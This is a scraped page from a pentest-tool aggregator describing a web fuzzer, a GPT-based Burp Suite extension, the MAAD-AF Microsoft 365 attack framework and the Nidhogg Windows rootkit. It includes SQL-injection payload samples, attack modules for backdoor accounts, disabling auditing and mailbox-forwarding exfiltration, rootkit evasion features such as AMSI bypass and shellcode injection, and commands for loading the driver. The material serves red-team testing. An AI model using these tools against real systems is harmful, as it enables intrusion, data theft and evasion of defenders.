15 LOG4j 16 Stress Tests
17 WebDAV 18 LFI, RFI or RCE.
19 XSS, SQLi, BSQL 20 XSS Header not present
21 Shellshock Bug 22 Leaks Internal IP
23 HTTP PUT DEL Methods 24 MS10-070
25 Outdated 26 CGI Directories
27 Interesting Files 28 Injectable Paths
29 Subdomains 30 MS-SQL DB Service
31 ORACLE DB Service 32 MySQL DB Service
33 RDP Server over UDP and TCP 34 SNMP Service
35 Elmah 36 SMB Ports over TCP and UDP
37 IIS WebDAV 38 X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions , Feature Requests and Bug Reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub:@nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Firefly - Black Box Fuzzer For Web Applications

By: Zion3R β€” June 17th 2023 at 12:30

Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.

Note:

Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.

Β 

Advantages

  • Hevy use of gorutines and internal hardware for great preformance
  • Built-in engine that handles each task for "x" response results inductively
  • Highly cusomized to handle more complex fuzzing
  • Filter options and request verifications to avoid junk results
  • Friendly error and debug output
  • Build in payloads (default list are mixed with the wordlist from seclists)
  • Payload tampering and encoding functionality

Features


Installation

go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

If the above install method do not work try the following:

git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h

Usage

Simple

firefly -h
firefly -u 'http://example.com/?query=FUZZ'

Advanced usage

Request

Different types of request input that can be used

Basic

firefly -u 'http://example.com/?query=FUZZ' --timeout 7000

Request with different methods and protocols

firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws

Pipeline

echo 'http://example.com/?query=FUZZ' | firefly 

HTTP Raw

firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'

This will send the HTTP Raw and auto detect all GET and/or POST parameters to fuzz.

firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ

B=2&C=3' -au replace

Request Verifier

Request verifier is the most important part. This feature let Firefly know the core behavior of the target your fuzz. It's important to do quality over quantity. More verfiy requests will lead to better quality at the cost of internal hardware preformance (depending on your hardware)

firefly -u 'http://example.com/?query=FUZZ' -e 

Payloads

Payload can be highly customized and with a good core wordlist it's possible to be able to fully adapt the payload wordlist within Firefly itself.

Payload debug

Display the format of all payloads and exit

firefly -show-payload

Tampers

List of all Tampers avalible

firefly -list-tamper

Tamper all paylodas with given type (More than one can be used separated by comma)

firefly -u 'http://example.com/?query=FUZZ' -e s2c

Encode

firefly -u 'http://example.com/?query=FUZZ' -e hex

Hex then URL encode all payloads

firefly -u 'http://example.com/?query=FUZZ' -e hex,url

Payload regex replace

firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'

The Payloads: ' or (1=1)-- - and " or(20=20)or " Will result in: ' or (13=(37-24))-- - and " or(13=(37-24))or " Where the => (with spaces) inducate the "replace to".

Filters

Filter options to filter/match requests that include a given rule.

Filter response to ignore (filter) status code 302 and line count 0

firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0

Filter responses to include (match) regex, and status code 200

firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200

Preformance

Preformance and time delays to use for the request process

Threads / Concurrency

firefly -u 'http://example.com/?query=FUZZ' -t 35

Time Delay in millisecounds (ms) for each Concurrency

FireFly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000

Wordlists

Wordlist that contains the paylaods can be added separatly or extracted from a given folder

Single Wordlist with its attack type

firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz

Extract all wordlists inside a folder. Attack type is depended on the suffix <type>_wordlist.txt

firefly -u 'http://example.com/?query=FUZZ' -w wl/

Example

Wordlists names inside folder wl :

  1. fuzz_wordlist.txt
  2. time_wordlist.txt

Output

JSON output is strongly recommended. This is because you can benefit from the jq tool to navigate throw the result and compare it.

(If Firefly is pipeline chained with other tools, standard plaintext may be a better choice.)

Simple plaintext output format

firefly -u 'http://example.com/?query=FUZZ' -o file.txt

JSON output format (recommended)

firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

Community

Everyone in the community are allowed to suggest new features, improvements and/or add new payloads to Firefly just make a pull request or add a comment with your suggestions!



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Burpgpt - A Burp Suite Extension That Integrates OpenAI's GPT To Perform An Additional Passive Scan For Discovering Highly Bespoke Vulnerabilities, And Enables Running Traffic-Based Analysis Of Any Type

By: Zion3R β€” June 13th 2023 at 12:30


burpgpt leverages the power of AI to detect security vulnerabilities that traditional scanners might miss. It sends web traffic to an OpenAI model specified by the user, enabling sophisticated analysis within the passive scanner. This extension offers customisable prompts that enable tailored web traffic analysis to meet the specific needs of each user. Check out the Example Use Cases section for inspiration.

The extension generates an automated security report that summarises potential security issues based on the user's prompt and real-time data from Burp-issued requests. By leveraging AI and natural language processing, the extension streamlines the security assessment process and provides security professionals with a higher-level overview of the scanned application or endpoint. This enables them to more easily identify potential security issues and prioritise their analysis, while also covering a larger potential attack surface.

[!WARNING] Data traffic is sent to OpenAI for analysis. If you have concerns about this or are using the extension for security-critical applications, it is important to carefully consider this and review OpenAI's Privacy Policy for further information.

[!WARNING] While the report is automated, it still requires triaging and post-processing by security professionals, as it may contain false positives.

[!WARNING] The effectiveness of this extension is heavily reliant on the quality and precision of the prompts created by the user for the selected GPT model. This targeted approach will help ensure the GPT model generates accurate and valuable results for your security analysis.

Β 

Features

  • Adds a passive scan check, allowing users to submit HTTP data to an OpenAI-controlled GPT model for analysis through a placeholder system.
  • Leverages the power of OpenAI's GPT models to conduct comprehensive traffic analysis, enabling detection of various issues beyond just security vulnerabilities in scanned applications.
  • Enables granular control over the number of GPT tokens used in the analysis by allowing for precise adjustments of the maximum prompt length.
  • Offers users multiple OpenAI models to choose from, allowing them to select the one that best suits their needs.
  • Empowers users to customise prompts and unleash limitless possibilities for interacting with OpenAI models. Browse through the Example Use Cases for inspiration.
  • Integrates with Burp Suite, providing all native features for pre- and post-processing, including displaying analysis results directly within the Burp UI for efficient analysis.
  • Provides troubleshooting functionality via the native Burp Event Log, enabling users to quickly resolve communication issues with the OpenAI API.

Requirements

  1. System requirements:
  • Operating System: Compatible with Linux, macOS, and Windows operating systems.

  • Java Development Kit (JDK): Version 11 or later.

  • Burp Suite Professional or Community Edition: Version 2023.3.2 or later.

    [!IMPORTANT] Please note that using any version lower than 2023.3.2 may result in a java.lang.NoSuchMethodError. It is crucial to use the specified version or a more recent one to avoid this issue.

  1. Build tool:
  • Gradle: Version 6.9 or later (recommended). The build.gradle file is provided in the project repository.
  1. Environment variables:
  • Set up the JAVA_HOME environment variable to point to the JDK installation directory.

Please ensure that all system requirements, including a compatible version of Burp Suite, are met before building and running the project. Note that the project's external dependencies will be automatically managed and installed by Gradle during the build process. Adhering to the requirements will help avoid potential issues and reduce the need for opening new issues in the project repository.

Installation

1. Compilation

  1. Ensure you have Gradle installed and configured.

  2. Download the burpgpt repository:

    git clone https://github.com/aress31/burpgpt
    cd .\burpgpt\
  3. Build the standalone jar:

    ./gradlew shadowJar

2. Loading the Extension Into Burp Suite

To install burpgpt in Burp Suite, first go to the Extensions tab and click on the Add button. Then, select the burpgpt-all jar file located in the .\lib\build\libs folder to load the extension.

Usage

To start using burpgpt, users need to complete the following steps in the Settings panel, which can be accessed from the Burp Suite menu bar:

  1. Enter a valid OpenAI API key.
  2. Select a model.
  3. Define the max prompt size. This field controls the maximum prompt length sent to OpenAI to avoid exceeding the maxTokens of GPT models (typically around 2048 for GPT-3).
  4. Adjust or create custom prompts according to your requirements.

Once configured as outlined above, the Burp passive scanner sends each request to the chosen OpenAI model via the OpenAI API for analysis, producing Informational-level severity findings based on the results.

Prompt Configuration

burpgpt enables users to tailor the prompt for traffic analysis using a placeholder system. To include relevant information, we recommend using these placeholders, which the extension handles directly, allowing dynamic insertion of specific values into the prompt:

Placeholder Description
{REQUEST} The scanned request.
{URL} The URL of the scanned request.
{METHOD} The HTTP request method used in the scanned request.
{REQUEST_HEADERS} The headers of the scanned request.
{REQUEST_BODY} The body of the scanned request.
{RESPONSE} The scanned response.
{RESPONSE_HEADERS} The headers of the scanned response.
{RESPONSE_BODY} The body of the scanned response.
{IS_TRUNCATED_PROMPT} A boolean value that is programmatically set to true or false to indicate whether the prompt was truncated to the Maximum Prompt Size defined in the Settings.

These placeholders can be used in the custom prompt to dynamically generate a request/response analysis prompt that is specific to the scanned request.

[!NOTE] > Burp Suite provides the capability to support arbitrary placeholders through the use of Session handling rules or extensions such as Custom Parameter Handler, allowing for even greater customisation of the prompts.

Example Use Cases

The following list of example use cases showcases the bespoke and highly customisable nature of burpgpt, which enables users to tailor their web traffic analysis to meet their specific needs.

  • Identifying potential vulnerabilities in web applications that use a crypto library affected by a specific CVE:

    Analyse the request and response data for potential security vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER}:

    Web Application URL: {URL}
    Crypto Library Name: {CRYPTO_LIBRARY_NAME}
    CVE Number: CVE-{CVE_NUMBER}
    Request Headers: {REQUEST_HEADERS}
    Response Headers: {RESPONSE_HEADERS}
    Request Body: {REQUEST_BODY}
    Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER} in the request and response data and report them.
  • Scanning for vulnerabilities in web applications that use biometric authentication by analysing request and response data related to the authentication process:

    Analyse the request and response data for potential security vulnerabilities related to the biometric authentication process:

    Web Application URL: {URL}
    Biometric Authentication Request Headers: {REQUEST_HEADERS}
    Biometric Authentication Response Headers: {RESPONSE_HEADERS}
    Biometric Authentication Request Body: {REQUEST_BODY}
    Biometric Authentication Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the biometric authentication process in the request and response data and report them.
  • Analysing the request and response data exchanged between serverless functions for potential security vulnerabilities:

    Analyse the request and response data exchanged between serverless functions for potential security vulnerabilities:

    Serverless Function A URL: {URL}
    Serverless Function B URL: {URL}
    Serverless Function A Request Headers: {REQUEST_HEADERS}
    Serverless Function B Response Headers: {RESPONSE_HEADERS}
    Serverless Function A Request Body: {REQUEST_BODY}
    Serverless Function B Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities in the data exchanged between the two serverless functions and report them.
  • Analysing the request and response data for potential security vulnerabilities specific to a Single-Page Application (SPA) framework:

    Analyse the request and response data for potential security vulnerabilities specific to the {SPA_FRAMEWORK_NAME} SPA framework:

    Web Application URL: {URL}
    SPA Framework Name: {SPA_FRAMEWORK_NAME}
    Request Headers: {REQUEST_HEADERS}
    Response Headers: {RESPONSE_HEADERS}
    Request Body: {REQUEST_BODY}
    Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the {SPA_FRAMEWORK_NAME} SPA framework in the request and response data and report them.

Roadmap

  • Add a new field to the Settings panel that allows users to set the maxTokens limit for requests, thereby limiting the request size.
  • Add support for connecting to a local instance of the AI model, allowing users to run and interact with the model on their local machines, potentially improving response times and data privacy.
  • Retrieve the precise maxTokens value for each model to transmit the maximum allowable data and obtain the most extensive GPT response possible.
  • Implement persistent configuration storage to preserve settings across Burp Suite restarts.
  • Enhance the code for accurate parsing of GPT responses into the Vulnerability model for improved reporting.

Project Information

The extension is currently under development and we welcome feedback, comments, and contributions to make it even better.

Sponsor

If this extension has saved you time and hassle during a security assessment, consider showing some love by sponsoring a cup of coffee

for the developer. It's the fuel that powers development, after all. Just hit that shiny Sponsor button at the top of the page or click here to contribute and keep the caffeine flowing.

Reporting Issues

Did you find a bug? Well, don't just let it crawl around! Let's squash it together like a couple of bug whisperers!

Please report any issues on the GitHub issues tracker. Together, we'll make this extension as reliable as a cockroach surviving a nuclear apocalypse!

Contributing

Looking to make a splash with your mad coding skills?

Awesome! Contributions are welcome and greatly appreciated. Please submit all PRs on the GitHub pull requests tracker. Together we can make this extension even more amazing!

License

See LICENSE.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

MAAD-AF - MAAD Attack Framework - An Attack Tool For Simple, Fast And Effective Security Testing Of M365 And Azure AD

By: Zion3R β€” June 4th 2023 at 12:30

MAAD-AF is an open-source cloud attack tool developed for testing security of Microsoft 365 & Azure AD environments through adversary emulation. MAAD-AF provides security practitioners easy to use attack modules to exploit configurations across different M365/AzureAD cloud-based tools & services.

MAAD-AF is designed to make cloud security testing simple, fast and effective. Through its virtually no-setup requirement and easy to use interactive attack modules, security teams can test their security controls, detection and response capabilities easily and swiftly.

Features

  • Pre & Post-compromise techniques
  • Simple interactive use
  • Virtually no-setup requirements
  • Attack modules for Azure AD
  • Attack modules for Exchange
  • Attack modules for Teams
  • Attack modules for SharePoint
  • Attack modules for eDiscovery

MAAD-AF Attack Modules

  • Azure AD External Recon (Includes sub-modules)
  • Azure AD Internal Recon (Includes sub-modules)
  • Backdoor Account Setup
  • Trusted Network Modification
  • Disable Mailbox Auditing
  • Disable Anti-Phishing
  • Mailbox Deletion Rule Setup
  • Exfiltration through Mailbox Forwarding
  • Gain User Mailbox Access
  • External Teams Access Setup (Includes sub-modules)
  • eDiscovery exploitation (Includes sub-modules)
  • Bruteforce
  • MFA Manipulation
  • User Account Deletion
  • SharePoint exploitation (Includes sub-modules)

Getting Started

Plug & Play - It's that easy!

  1. Clone or download the MAAD-AF github repo to your windows host
  2. Open PowerShell as Administrator
  3. Navigate to the local MAAD-AF directory (cd /MAAD-AF)
  4. Run MAAD_Attack.ps1 (./MAAD_Attack.ps1)

Requirements

  1. Internet accessible Windows host
  2. PowerShell (version 5 or later) terminal as Administrator
  3. The following PowerShell modules are required and will be installed automatically:

Tip: A 'Global Admin' privilege account is recommended to leverage full capabilities of modules in MAAD-AF

Limitations

  • MAAD-AF is currently only fully supported on Windows OS

Contribute

  • Thank you for considering contributing to MAAD-AF!
  • Your contributions will help make MAAD-AF better.
  • Join the mission to make security testing simple, fast and effective.
  • There's ongoing efforts to make the source code more modular to enable easier contributions.
  • Continue monitoring this space for updates on how you can easily incorporate new attack modules into MAAD-AF.

Add Custom Modules

  • Everyone is encouraged to come up with new attack modules that can be added to the MAAD-AF Library.
  • Attack modules are functions that leverage access & privileges established by MAAD-AF to exploit configuration flaws in Microsoft services.

Report Bugs

  • Submit bugs or other issues related to the tool directly in the "Issues" section

Request Features

  • Share those great ideas. Submit new features to add to the MAAD-AFs functionality.

Contact

  • If you found this tool useful, want to share an interesting use-case, bring issues to attention, whatever the reason - I would love to hear from you. You can contact at: maad-af@vectra.ai or post in repository Discussions.


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Nidhogg - All-In-One Simple To Use Rootkit For Red Teams

By: Zion3R β€” May 31st 2023 at 12:30


Nidhogg is a multi-functional rootkit for red teams. The goal of Nidhogg is to provide an all-in-one and easy-to-use rootkit with multiple helpful functionalities for red team engagements that can be integrated with your C2 framework via a single header file with simple usage, you can see an example here.

Nidhogg can work on any version of x64 Windows 10 and Windows 11.

This repository contains a kernel driver with a C++ header to communicate with it.


Current Features

  • Process hiding and unhiding
  • Process elevation
  • Process protection (anti-kill and dumping)
  • Bypass pe-sieve
  • Thread hiding
  • Thread protection (anti-kill)
  • File protection (anti-deletion and overwriting)
  • File hiding
  • Registry keys and values protection (anti-deletion and overwriting)
  • Registry keys and values hiding
  • Querying currently protected processes, threads, files, registry keys and values
  • Arbitrary kernel R/W
  • Function patching
  • Built-in AMSI bypass
  • Built-in ETW patch
  • Process signature (PP/PPL) modification
  • Can be reflectively loaded
  • Shellcode Injection
    • APC
    • NtCreateThreadEx
  • DLL Injection
    • APC
    • NtCreateThreadEx
  • Querying kernel callbacks
    • ObCallbacks
    • Process and thread creation routines
    • Image loading routines
    • Registry callbacks
  • Removing and restoring kernel callbacks
  • ETWTI tampering

Reflective loading

Since version v0.3, Nidhogg can be reflectively loaded with kdmapper but because PatchGuard will be automatically triggered if the driver registers callbacks, Nidhogg will not register any callback. Meaning, that if you are loading the driver reflectively these features will be disabled by default:

  • Process protection
  • Thread protection
  • Registry operations

PatchGuard triggering features

These are the features known to me that will trigger PatchGuard, you can still use them at your own risk.

  • Process hiding
  • File protecting

Basic Usage

It has a very simple usage, just include the header and get started!

#include "Nidhogg.hpp"

int main() {
HANDLE hNidhogg = CreateFile(DRIVER_NAME, GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);
// ...
DWORD result = Nidhogg::ProcessUtils::NidhoggProcessProtect(pids);
// ...
}

Setup

Building the client

To compile the client, you will need to install CMake and Visual Studio 2022 installed and then just run:

cd <NIDHOGG PROJECT DIRECTORY>\Example
mkdir build
cd build
cmake ..
cmake --build .

Building the driver

To compile the project, you will need the following tools:

Clone the repository and build the driver.

Driver Testing

To test it in your testing environment run those commands with elevated cmd:

bcdedit /set testsigning on

After rebooting, create a service and run the driver:

sc create nidhogg type= kernel binPath= C:\Path\To\Driver\Nidhogg.sys
sc start nidhogg

Debugging

To debug the driver in your testing environment run this command with elevated cmd and reboot your computer:

bcdedit /debug on

After the reboot, you can see the debugging messages in tools such as DebugView.

Resources

Contributions

Thanks a lot to those people that contributed to this project:



❌